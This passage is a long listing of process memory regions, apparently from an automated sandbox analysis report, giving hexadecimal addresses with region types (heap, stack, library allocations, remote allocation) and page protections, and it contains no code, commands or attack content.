|
page read and write
|
||
2125F550000
|
trusted library allocation
|
page read and write
|
||
1F5525B6000
|
heap
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
243FC77D000
|
heap
|
page read and write
|
||
1DE824F5000
|
heap
|
page read and write
|
||
2126F564000
|
trusted library allocation
|
page read and write
|
||
29AAE428000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
5EBE000
|
stack
|
page read and write
|
||
243FC995000
|
heap
|
page read and write
|
||
1F5525A5000
|
heap
|
page read and write
|
||
790847F000
|
stack
|
page read and write
|
||
29AA9B80000
|
trusted library allocation
|
page read and write
|
||
29AAF01E000
|
trusted library allocation
|
page read and write
|
||
29AAF3EE000
|
trusted library allocation
|
page read and write
|
||
29AADAD6000
|
trusted library allocation
|
page read and write
|
||
29AAD224000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
29AAEC75000
|
trusted library allocation
|
page read and write
|
||
1DE807E0000
|
heap
|
page read and write
|
||
1DE824A0000
|
heap
|
page read and write
|
||
29AAF277000
|
trusted library allocation
|
page read and write
|
||
29AAEAB1000
|
trusted library allocation
|
page read and write
|
||
29AAD4E6000
|
trusted library allocation
|
page read and write
|
||
BFD904B000
|
stack
|
page read and write
|
||
29AAF0E6000
|
trusted library allocation
|
page read and write
|
||
1F552094000
|
heap
|
page read and write
|
||
1F55076F000
|
heap
|
page read and write
|
||
29AAE3A8000
|
trusted library allocation
|
page read and write
|
||
29AAF43E000
|
trusted library allocation
|
page read and write
|
||
29AAD6A6000
|
trusted library allocation
|
page read and write
|
||
1DE8264E000
|
heap
|
page read and write
|
||
212C4DF9000
|
heap
|
page read and write
|
||
1F552541000
|
heap
|
page read and write
|
||
2ECEDBF000
|
stack
|
page read and write
|
||
243FC7A7000
|
heap
|
page read and write
|
||
29AAE328000
|
trusted library allocation
|
page read and write
|
||
29AAD0F4000
|
trusted library allocation
|
page read and write
|
||
243FE711000
|
heap
|
page read and write
|
||
29AAE358000
|
trusted library allocation
|
page read and write
|
||
29AAEE7E000
|
trusted library allocation
|
page read and write
|
||
29AADF98000
|
trusted library allocation
|
page read and write
|
||
1F552586000
|
heap
|
page read and write
|
||
29AAEAE8000
|
trusted library allocation
|
page read and write
|
||
29AAEECE000
|
trusted library allocation
|
page read and write
|
||
212AADC3000
|
heap
|
page read and write
|
||
243FC999000
|
heap
|
page read and write
|
||
29AAE458000
|
trusted library allocation
|
page read and write
|
||
29AAD1B4000
|
trusted library allocation
|
page read and write
|
||
29AACBDC000
|
trusted library allocation
|
page read and write
|
||
29AAEAC8000
|
trusted library allocation
|
page read and write
|
||
29AADED7000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
29AAD2D5000
|
trusted library allocation
|
page read and write
|
||
29AADF58000
|
trusted library allocation
|
page read and write
|
||
29AAEE8E000
|
trusted library allocation
|
page read and write
|
||
1F550790000
|
heap
|
page read and write
|
||
29AADD36000
|
trusted library allocation
|
page read and write
|
||
1DE824A3000
|
heap
|
page read and write
|
||
1DE805EF000
|
heap
|
page read and write
|
||
29AADAC6000
|
trusted library allocation
|
page read and write
|
||
29AAE5D8000
|
trusted library allocation
|
page read and write
|
||
2125F4B0000
|
heap
|
page read and write
|
||
29AAF43A000
|
trusted library allocation
|
page read and write
|
||
6008000
|
heap
|
page read and write
|
||
1DE82525000
|
heap
|
page read and write
|
||
212BCD54000
|
trusted library allocation
|
page read and write
|
||
2125F320000
|
heap
|
page read and write
|
||
29AADE27000
|
trusted library allocation
|
page read and write
|
||
1DE8245C000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
29AAF4E5000
|
trusted library allocation
|
page read and write
|
||
29AAF12E000
|
trusted library allocation
|
page read and write
|
||
29AAEAF8000
|
trusted library allocation
|
page read and write
|
||
212ACCD0000
|
heap
|
page execute and read and write
|
||
276E000
|
stack
|
page read and write
|
||
29AAD4F6000
|
trusted library allocation
|
page read and write
|
||
29AAE008000
|
trusted library allocation
|
page read and write
|
||
29AAD204000
|
trusted library allocation
|
page read and write
|
||
29AAED7D000
|
trusted library allocation
|
page read and write
|
||
29AADCA6000
|
trusted library allocation
|
page read and write
|
||
29AACF07000
|
trusted library allocation
|
page read and write
|
||
29AAEFBE000
|
trusted library allocation
|
page read and write
|
||
29AAF036000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
212ACE04000
|
trusted library allocation
|
page read and write
|
||
29AAE378000
|
trusted library allocation
|
page read and write
|
||
29AAF402000
|
trusted library allocation
|
page read and write
|
||
29AAD3B6000
|
trusted library allocation
|
page read and write
|
||
29AAD3E6000
|
trusted library allocation
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
29AAF3FE000
|
trusted library allocation
|
page read and write
|
||
29AACC31000
|
trusted library allocation
|
page read and write
|
||
1F552596000
|
heap
|
page read and write
|
||
243FE71A000
|
heap
|
page read and write
|
||
29AAC9BF000
|
trusted library allocation
|
page read and write
|
||
212AAD30000
|
heap
|
page read and write
|
||
29AA9FD0000
|
heap
|
page execute and read and write
|
||
243FE5A5000
|
heap
|
page read and write
|
||
29AAF046000
|
trusted library allocation
|
page read and write
|
||
AF4000
|
heap
|
page read and write
|
||
1F5506C0000
|
heap
|
page read and write
|
||
29AAF3CE000
|
trusted library allocation
|
page read and write
|
||
29AADD46000
|
trusted library allocation
|
page read and write
|
||
29AAEEFE000
|
trusted library allocation
|
page read and write
|
||
29AAEE4E000
|
trusted library allocation
|
page read and write
|
||
1DE824EA000
|
heap
|
page read and write
|
||
29AACF0C000
|
trusted library allocation
|
page read and write
|
||
29AAE4E8000
|
trusted library allocation
|
page read and write
|
||
29AAEE76000
|
trusted library allocation
|
page read and write
|
||
1F55258A000
|
heap
|
page read and write
|
||
243FC71A000
|
heap
|
page read and write
|
||
1F55076B000
|
heap
|
page read and write
|
||
1DE80710000
|
heap
|
page read and write
|
||
29AADA46000
|
trusted library allocation
|
page read and write
|
||
243FC99B000
|
heap
|
page read and write
|
||
29AAE7C8000
|
trusted library allocation
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
1DE8246B000
|
heap
|
page read and write
|
||
29AAEC5D000
|
trusted library allocation
|
page read and write
|
||
2125EFD4000
|
heap
|
page read and write
|
||
1F5524F0000
|
heap
|
page read and write
|
||
243FE757000
|
heap
|
page read and write
|
||
1DE83FC2000
|
heap
|
page read and write
|
||
29AAF283000
|
trusted library allocation
|
page read and write
|
||
29AAE278000
|
trusted library allocation
|
page read and write
|
||
29AAE608000
|
trusted library allocation
|
page read and write
|
||
212AD10F000
|
trusted library allocation
|
page read and write
|
||
29AAE9E6000
|
trusted library allocation
|
page read and write
|
||
212775F0000
|
heap
|
page read and write
|
||
29AAEBFD000
|
trusted library allocation
|
page read and write
|
||
212ACE12000
|
trusted library allocation
|
page read and write
|
||
29AAE2E8000
|
trusted library allocation
|
page read and write
|
||
243FC7DE000
|
heap
|
page read and write
|
||
243FC7A3000
|
heap
|
page read and write
|
||
1F554030000
|
heap
|
page read and write
|
||
29AAD6D6000
|
trusted library allocation
|
page read and write
|
||
29AACC51000
|
trusted library allocation
|
page read and write
|
||
212C4EC7000
|
heap
|
page read and write
|
||
A34000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
504C000
|
stack
|
page read and write
|
||
1DE82460000
|
heap
|
page read and write
|
||
1F5525BB000
|
heap
|
page read and write
|
||
1DE8253B000
|
heap
|
page read and write
|
||
29AACA2F000
|
trusted library allocation
|
page read and write
|
||
29AAE1D8000
|
trusted library allocation
|
page read and write
|
||
29AAE078000
|
trusted library allocation
|
page read and write
|
||
1F5524FC000
|
heap
|
page read and write
|
||
2640000
|
trusted library allocation
|
page read and write
|
||
2125F515000
|
trusted library allocation
|
page read and write
|
||
BFD7FFE000
|
stack
|
page read and write
|
||
4E11000
|
trusted library allocation
|
page read and write
|
||
29AAD184000
|
trusted library allocation
|
page read and write
|
||
1DE805F6000
|
heap
|
page read and write
|
||
1DE80730000
|
heap
|
page read and write
|
||
5540000
|
heap
|
page read and write
|
||
29AACDA9000
|
trusted library allocation
|
page read and write
|
||
29AADEA7000
|
trusted library allocation
|
page read and write
|
||
29AAF3E6000
|
trusted library allocation
|
page read and write
|
||
1DE824B1000
|
heap
|
page read and write
|
||
2126F4F1000
|
trusted library allocation
|
page read and write
|
||
BFD847E000
|
stack
|
page read and write
|
||
243FC7DE000
|
heap
|
page read and write
|
||
29AAF076000
|
trusted library allocation
|
page read and write
|
||
29AAF0AE000
|
trusted library allocation
|
page read and write
|
||
29AADDC6000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
29AAE588000
|
trusted library allocation
|
page read and write
|
||
1F5506B9000
|
heap
|
page read and write
|
||
3F2ADB9000
|
stack
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
4DF6000
|
trusted library allocation
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
212C5000000
|
heap
|
page read and write
|
||
243FE40C000
|
heap
|
page read and write
|
||
29AAD606000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
29AADF28000
|
trusted library allocation
|
page read and write
|
||
212AADC1000
|
heap
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
5290000
|
heap
|
page read and write
|
||
1F5524E6000
|
heap
|
page read and write
|
||
212C4E8E000
|
heap
|
page read and write
|
||
29AAF41E000
|
trusted library allocation
|
page read and write
|
||
243FC998000
|
heap
|
page read and write
|
||
1DE8055B000
|
heap
|
page read and write
|
||
2ECE363000
|
stack
|
page read and write
|
||
BFD857B000
|
stack
|
page read and write
|
||
2125F995000
|
trusted library allocation
|
page read and write
|
||
1F550763000
|
heap
|
page read and write
|
||
29AAE1F8000
|
trusted library allocation
|
page read and write
|
||
1DE80550000
|
heap
|
page read and write
|
||
29AAF0D6000
|
trusted library allocation
|
page read and write
|
||
29AAEDDD000
|
trusted library allocation
|
page read and write
|
||
29AAEEC5000
|
trusted library allocation
|
page read and write
|
||
29AAE2A8000
|
trusted library allocation
|
page read and write
|
||
AA6000
|
trusted library allocation
|
page execute and read and write
|
||
29AAF3BE000
|
trusted library allocation
|
page read and write
|
||
29AAEB08000
|
trusted library allocation
|
page read and write
|
||
29AACBCC000
|
trusted library allocation
|
page read and write
|
||
29AAD9E6000
|
trusted library allocation
|
page read and write
|
||
29AADBB6000
|
trusted library allocation
|
page read and write
|
||
29AAF52F000
|
trusted library allocation
|
page read and write
|
||
29AAE5A8000
|
trusted library allocation
|
page read and write
|
||
2125D3BD000
|
heap
|
page read and write
|
||
29ABA0C0000
|
trusted library allocation
|
page read and write
|
||
A46000
|
heap
|
page read and write
|
||
29AADA06000
|
trusted library allocation
|
page read and write
|
||
1DE807EA000
|
heap
|
page read and write
|
||
243FC795000
|
heap
|
page read and write
|
||
29AAE158000
|
trusted library allocation
|
page read and write
|
||
29AAEA3A000
|
trusted library allocation
|
page read and write
|
||
29AAF214000
|
trusted library allocation
|
page read and write
|
||
29AAEA6A000
|
trusted library allocation
|
page read and write
|
||
29AAD275000
|
trusted library allocation
|
page read and write
|
||
2125D471000
|
heap
|
page read and write
|
||
1F55251C000
|
heap
|
page read and write
|
||
29AAED5D000
|
trusted library allocation
|
page read and write
|
||
1DE824F2000
|
heap
|
page read and write
|
||
29AAF4E2000
|
trusted library allocation
|
page read and write
|
||
29AADC66000
|
trusted library allocation
|
page read and write
|
||
7908B3B000
|
stack
|
page read and write
|
||
29AAEEDE000
|
trusted library allocation
|
page read and write
|
||
29AAE0D8000
|
trusted library allocation
|
page read and write
|
||
29AAD7D6000
|
trusted library allocation
|
page read and write
|
||
29AA9BF4000
|
heap
|
page read and write
|
||
29AAE708000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
21277510000
|
heap
|
page read and write
|
||
212774F0000
|
heap
|
page read and write
|
||
1F5524DC000
|
heap
|
page read and write
|
||
212C4E57000
|
heap
|
page read and write
|
||
29AADE97000
|
trusted library allocation
|
page read and write
|
||
29AAE748000
|
trusted library allocation
|
page read and write
|
||
BFD83FE000
|
stack
|
page read and write
|
||
29AAEEEE000
|
trusted library allocation
|
page read and write
|
||
1DE83FB0000
|
heap
|
page read and write
|
||
29AAEDC5000
|
trusted library allocation
|
page read and write
|
||
29AAE028000
|
trusted library allocation
|
page read and write
|
||
1F5524D9000
|
heap
|
page read and write
|
||
212C4EED000
|
heap
|
page read and write
|
||
29AAF3CA000
|
trusted library allocation
|
page read and write
|
||
1DE82470000
|
heap
|
page read and write
|
||
29AADFC8000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
29AADF9C000
|
trusted library allocation
|
page read and write
|
||
2125D690000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
1F55085D000
|
heap
|
page read and write
|
||
1DE805ED000
|
heap
|
page read and write
|
||
2125D3E7000
|
heap
|
page read and write
|
||
8A7DFE000
|
stack
|
page read and write
|
||
29AAD3D6000
|
trusted library allocation
|
page read and write
|
||
29AACE88000
|
trusted library allocation
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
29AAD3A6000
|
trusted library allocation
|
page read and write
|
||
29AAE388000
|
trusted library allocation
|
page read and write
|
||
1DE82474000
|
heap
|
page read and write
|
||
29AAEB9E000
|
trusted library allocation
|
page read and write
|
||
29AAD536000
|
trusted library allocation
|
page read and write
|
||
29AACD0A000
|
trusted library allocation
|
page read and write
|
||
1DE842E0000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
79089BE000
|
stack
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
29AAD1C4000
|
trusted library allocation
|
page read and write
|
||
29AAF27B000
|
trusted library allocation
|
page read and write
|
||
AB7000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
29AAEB76000
|
trusted library allocation
|
page read and write
|
||
BFD7F7D000
|
stack
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
29AAAF2D000
|
trusted library allocation
|
page read and write
|
||
1DE8248F000
|
heap
|
page read and write
|
||
29AAF28E000
|
trusted library allocation
|
page read and write
|
||
2ECE77E000
|
stack
|
page read and write
|
||
243FE3F0000
|
heap
|
page read and write
|
||
29AADB96000
|
trusted library allocation
|
page read and write
|
||
8A83FE000
|
stack
|
page read and write
|
||
29AAF056000
|
trusted library allocation
|
page read and write
|
||
29AAF0FE000
|
trusted library allocation
|
page read and write
|
||
29AADEB7000
|
trusted library allocation
|
page read and write
|
||
212ACF76000
|
trusted library allocation
|
page read and write
|
||
29AAE95A000
|
trusted library allocation
|
page read and write
|
||
1F552549000
|
heap
|
page read and write
|
||
3F2B6FF000
|
stack
|
page read and write
|
||
29AAE9BC000
|
trusted library allocation
|
page read and write
|
||
1DE80556000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
27AA000
|
stack
|
page read and write
|
||
243FC7A7000
|
heap
|
page read and write
|
||
29AAD9A6000
|
trusted library allocation
|
page read and write
|
||
29AAECFD000
|
trusted library allocation
|
page read and write
|
||
29AAEB0F000
|
trusted library allocation
|
page read and write
|
||
8A80FE000
|
stack
|
page read and write
|
||
29AACCDA000
|
trusted library allocation
|
page read and write
|
||
29AAC970000
|
trusted library allocation
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
29AADCC6000
|
trusted library allocation
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
29AAF07E000
|
trusted library allocation
|
page read and write
|
||
29AAE0C8000
|
trusted library allocation
|
page read and write
|
||
29AAF446000
|
trusted library allocation
|
page read and write
|
||
29AA829E000
|
heap
|
page read and write
|
||
212C4EF0000
|
heap
|
page execute and read and write
|
||
2125F608000
|
trusted library allocation
|
page read and write
|
||
29AAD0B4000
|
trusted library allocation
|
page read and write
|
||
21277632000
|
heap
|
page read and write
|
||
29AAFC1A000
|
trusted library allocation
|
page read and write
|
||
29AAD0E4000
|
trusted library allocation
|
page read and write
|
||
29AAE879000
|
trusted library allocation
|
page read and write
|
||
29AADF5C000
|
trusted library allocation
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
29AAEA91000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
29AAF292000
|
trusted library allocation
|
page read and write
|
||
BFD8278000
|
stack
|
page read and write
|
||
212AD173000
|
trusted library allocation
|
page read and write
|
||
29AAA132000
|
trusted library allocation
|
page read and write
|
||
212AD0EE000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
1DE807E9000
|
heap
|
page read and write
|
||
29AAE298000
|
trusted library allocation
|
page read and write
|
||
29AACDF9000
|
trusted library allocation
|
page read and write
|
||
29AAE478000
|
trusted library allocation
|
page read and write
|
||
29AAD265000
|
trusted library allocation
|
page read and write
|
||
29AAF02E000
|
trusted library allocation
|
page read and write
|
||
29AAECB5000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
29AAEE05000
|
trusted library allocation
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
29AAE218000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
29AA8240000
|
heap
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
29AAE1C8000
|
trusted library allocation
|
page read and write
|
||
29AAEE66000
|
trusted library allocation
|
page read and write
|
||
29AAEF56000
|
trusted library allocation
|
page read and write
|
||
2125F5F7000
|
trusted library allocation
|
page read and write
|
||
29AACC3B000
|
trusted library allocation
|
page read and write
|
||
A30000
|
trusted library allocation
|
page read and write
|
||
79087B6000
|
stack
|
page read and write
|
||
29AAE2D8000
|
trusted library allocation
|
page read and write
|
||
29AAE898000
|
trusted library allocation
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
4E02000
|
trusted library allocation
|
page read and write
|
||
212C4E59000
|
heap
|
page read and write
|
||
1DE80550000
|
heap
|
page read and write
|
||
29AADD86000
|
trusted library allocation
|
page read and write
|
||
2639000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
1F552599000
|
heap
|
page read and write
|
||
29AAE508000
|
trusted library allocation
|
page read and write
|
||
29AAEFFE000
|
trusted library allocation
|
page read and write
|
||
1F552531000
|
heap
|
page read and write
|
||
29AACC0C000
|
trusted library allocation
|
page read and write
|
||
243FE5A9000
|
heap
|
page read and write
|
||
29AAE718000
|
trusted library allocation
|
page read and write
|
||
29AAEB6E000
|
trusted library allocation
|
page read and write
|
||
790873E000
|
stack
|
page read and write
|
||
212AAD3D000
|
heap
|
page read and write
|
||
AFE000
|
heap
|
page read and write
|
||
2ECE9FE000
|
stack
|
page read and write
|
||
1F5506B0000
|
heap
|
page read and write
|
||
29AACE38000
|
trusted library allocation
|
page read and write
|
||
29AAD198000
|
trusted library allocation
|
page read and write
|
||
1F55076B000
|
heap
|
page read and write
|
||
243FC99C000
|
heap
|
page read and write
|
||
649C000
|
stack
|
page read and write
|
||
29AADA26000
|
trusted library allocation
|
page read and write
|
||
1F55255E000
|
heap
|
page read and write
|
||
1F550759000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
212ACCFF000
|
trusted library allocation
|
page read and write
|
||
243FC990000
|
heap
|
page read and write
|
||
243FC980000
|
remote allocation
|
page read and write
|
||
29AACA4F000
|
trusted library allocation
|
page read and write
|
||
29AAE4F8000
|
trusted library allocation
|
page read and write
|
||
29AAEF06000
|
trusted library allocation
|
page read and write
|
||
29AAEA71000
|
trusted library allocation
|
page read and write
|
||
29AAD696000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1DE82450000
|
heap
|
page read and write
|
||
29AAEFE6000
|
trusted library allocation
|
page read and write
|
||
1DE824C9000
|
heap
|
page read and write
|
||
1F5525D1000
|
heap
|
page read and write
|
||
1DE82456000
|
heap
|
page read and write
|
||
1F5525AF000
|
heap
|
page read and write
|
||
29AAD356000
|
trusted library allocation
|
page read and write
|
||
2125EFD0000
|
heap
|
page read and write
|
||
1F552575000
|
heap
|
page read and write
|
||
29AAEFF6000
|
trusted library allocation
|
page read and write
|
||
29AAEB5E000
|
trusted library allocation
|
page read and write
|
||
1DE82650000
|
heap
|
page read and write
|
||
29AAF166000
|
trusted library allocation
|
page read and write
|
||
29AACA8E000
|
trusted library allocation
|
page read and write
|
||
243FE76A000
|
heap
|
page read and write
|
||
29AACEEC000
|
trusted library allocation
|
page read and write
|
||
29AACA5F000
|
trusted library allocation
|
page read and write
|
||
29AAD596000
|
trusted library allocation
|
page read and write
|
||
243FC7A7000
|
heap
|
page read and write
|
||
29AAD4A6000
|
trusted library allocation
|
page read and write
|
||
46B37FF000
|
stack
|
page read and write
|
||
29AADB16000
|
trusted library allocation
|
page read and write
|
||
29ABA39F000
|
trusted library allocation
|
page read and write
|
||
1F5524F0000
|
heap
|
page read and write
|
||
29AAEAA9000
|
trusted library allocation
|
page read and write
|
||
29AACE18000
|
trusted library allocation
|
page read and write
|
||
29AAE628000
|
trusted library allocation
|
page read and write
|
||
7908ABE000
|
stack
|
page read and write
|
||
243FC777000
|
heap
|
page read and write
|
||
29AACBAC000
|
trusted library allocation
|
page read and write
|
||
2125D360000
|
heap
|
page read and write
|
||
29AAEE16000
|
trusted library allocation
|
page read and write
|
||
1F552503000
|
heap
|
page read and write
|
||
29AAF09E000
|
trusted library allocation
|
page read and write
|
||
29AAE438000
|
trusted library allocation
|
page read and write
|
||
29AAEBE5000
|
trusted library allocation
|
page read and write
|
||
1DE82451000
|
heap
|
page read and write
|
||
29AAF15E000
|
trusted library allocation
|
page read and write
|
||
29AAD836000
|
trusted library allocation
|
page read and write
|
||
1DE826F4000
|
heap
|
page read and write
|
||
29AAF086000
|
trusted library allocation
|
page read and write
|
||
1F55076B000
|
heap
|
page read and write
|
||
29AAEE86000
|
trusted library allocation
|
page read and write
|
||
29AA82E5000
|
heap
|
page read and write
|
||
A9D000
|
trusted library allocation
|
page execute and read and write
|
||
29AAD271000
|
trusted library allocation
|
page read and write
|
||
29AA82AA000
|
heap
|
page read and write
|
||
1DE805D1000
|
heap
|
page read and write
|
||
29AAE618000
|
trusted library allocation
|
page read and write
|
||
29AADD16000
|
trusted library allocation
|
page read and write
|
||
29AACF1C000
|
trusted library allocation
|
page read and write
|
||
29AAD716000
|
trusted library allocation
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
29AAD9F6000
|
trusted library allocation
|
page read and write
|
||
29AAF3F6000
|
trusted library allocation
|
page read and write
|
||
1DE8264E000
|
heap
|
page read and write
|
||
1F5506CB000
|
heap
|
page read and write
|
||
79085FE000
|
stack
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
29AADFF8000
|
trusted library allocation
|
page read and write
|
||
29AAEFCE000
|
trusted library allocation
|
page read and write
|
||
29AACEDC000
|
trusted library allocation
|
page read and write
|
||
243FE54C000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
212AD28D000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
29AACD1F000
|
trusted library allocation
|
page read and write
|
||
212ACDFB000
|
trusted library allocation
|
page read and write
|
||
29ABA0B1000
|
trusted library allocation
|
page read and write
|
||
243FE870000
|
heap
|
page read and write
|
||
29AAF455000
|
trusted library allocation
|
page read and write
|
||
212AAE2C000
|
heap
|
page read and write
|
||
29AAE5C8000
|
trusted library allocation
|
page read and write
|
||
243FE536000
|
heap
|
page read and write
|
||
A33000
|
trusted library allocation
|
page execute and read and write
|
||
2E0E000
|
trusted library allocation
|
page read and write
|
||
212AAD86000
|
heap
|
page read and write
|
||
29AAEE9E000
|
trusted library allocation
|
page read and write
|
||
29AADC96000
|
trusted library allocation
|
page read and write
|
||
1DE8245F000
|
heap
|
page read and write
|
||
29AAF416000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
243FC79B000
|
heap
|
page read and write
|
||
29AAD636000
|
trusted library allocation
|
page read and write
|
||
29AAD316000
|
trusted library allocation
|
page read and write
|
||
1DE82470000
|
heap
|
page read and write
|
||
46B3AFB000
|
stack
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
1DE807ED000
|
heap
|
page read and write
|
||
79088BD000
|
stack
|
page read and write
|
||
29AAED9E000
|
trusted library allocation
|
page read and write
|
||
212AAD58000
|
heap
|
page read and write
|
||
243FC751000
|
heap
|
page read and write
|
||
1F550733000
|
heap
|
page read and write
|
||
243FE730000
|
heap
|
page read and write
|
||
29AAEF8E000
|
trusted library allocation
|
page read and write
|
||
29AAE4A8000
|
trusted library allocation
|
page read and write
|
||
212BCCE1000
|
trusted library allocation
|
page read and write
|
||
29AAEC9D000
|
trusted library allocation
|
page read and write
|
||
629E000
|
stack
|
page read and write
|
||
1DE82522000
|
heap
|
page read and write
|
||
29AAEB3F000
|
trusted library allocation
|
page read and write
|
||
1DE82470000
|
heap
|
page read and write
|
||
29AAD986000
|
trusted library allocation
|
page read and write
|
||
29AAF03E000
|
trusted library allocation
|
page read and write
|
||
29AAE108000
|
trusted library allocation
|
page read and write
|
||
243FC980000
|
remote allocation
|
page read and write
|
||
29AAD376000
|
trusted library allocation
|
page read and write
|
||
46B39FC000
|
stack
|
page read and write
|
||
29AAEAD0000
|
trusted library allocation
|
page read and write
|
||
29AADB86000
|
trusted library allocation
|
page read and write
|
||
29AADC16000
|
trusted library allocation
|
page read and write
|
||
1F552561000
|
heap
|
page read and write
|
||
29AAF3DA000
|
trusted library allocation
|
page read and write
|
||
1DE807E8000
|
heap
|
page read and write
|
||
BFD7EFF000
|
stack
|
page read and write
|
||
29AAD7F6000
|
trusted library allocation
|
page read and write
|
||
243FC795000
|
heap
|
page read and write
|
||
1DE8249C000
|
heap
|
page read and write
|
||
29AAF442000
|
trusted library allocation
|
page read and write
|
||
29AAF0C6000
|
trusted library allocation
|
page read and write
|
||
29AADF48000
|
trusted library allocation
|
page read and write
|
||
29AAF25C000
|
trusted library allocation
|
page read and write
|
||
29AAD178000
|
trusted library allocation
|
page read and write
|
||
2125F4D7000
|
heap
|
page execute and read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
29AAEFD6000
|
trusted library allocation
|
page read and write
|
||
29AAF066000
|
trusted library allocation
|
page read and write
|
||
212AB000000
|
trusted library allocation
|
page read and write
|
||
29AAD906000
|
trusted library allocation
|
page read and write
|
||
46B3DFF000
|
stack
|
page read and write
|
||
29AAD064000
|
trusted library allocation
|
page read and write
|
||
212AD0A8000
|
trusted library allocation
|
page read and write
|
||
2125D570000
|
trusted library allocation
|
page read and write
|
||
1DE82465000
|
heap
|
page read and write
|
||
29AAEB96000
|
trusted library allocation
|
page read and write
|
||
29AAEDF6000
|
trusted library allocation
|
page read and write
|
||
29AACF2C000
|
trusted library allocation
|
page read and write
|
||
29AAED56000
|
trusted library allocation
|
page read and write
|
||
29AAF016000
|
trusted library allocation
|
page read and write
|
||
1DE805EC000
|
heap
|
page read and write
|
||
29AADE57000
|
trusted library allocation
|
page read and write
|
||
29AACCAB000
|
trusted library allocation
|
page read and write
|
||
29AAC9CF000
|
trusted library allocation
|
page read and write
|
||
1F5524F0000
|
heap
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
29AADE77000
|
trusted library allocation
|
page read and write
|
||
29AAD035000
|
trusted library allocation
|
page read and write
|
||
243FC78F000
|
heap
|
page read and write
|
||
2125F37D000
|
heap
|
page read and write
|
||
243FE82C000
|
heap
|
page read and write
|
||
29AAD9C6000
|
trusted library allocation
|
page read and write
|
||
29AACFE6000
|
trusted library allocation
|
page read and write
|
||
29AAE2C8000
|
trusted library allocation
|
page read and write
|
||
29AAEEF5000
|
trusted library allocation
|
page read and write
|
||
29AAF1B6000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
29AAD134000
|
trusted library allocation
|
page read and write
|
||
29AACD99000
|
trusted library allocation
|
page read and write
|
||
29AACDC9000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
29AAEAA1000
|
trusted library allocation
|
page read and write
|
||
2ECEE3B000
|
stack
|
page read and write
|
||
29AAD9D6000
|
trusted library allocation
|
page read and write
|
||
29AAE698000
|
trusted library allocation
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
29AAD295000
|
trusted library allocation
|
page read and write
|
||
29ABADAD000
|
trusted library allocation
|
page read and write
|
||
29AAEE1D000
|
trusted library allocation
|
page read and write
|
||
46B31B6000
|
stack
|
page read and write
|
||
29AAE308000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1F5524D0000
|
heap
|
page read and write
|
||
29AAD416000
|
trusted library allocation
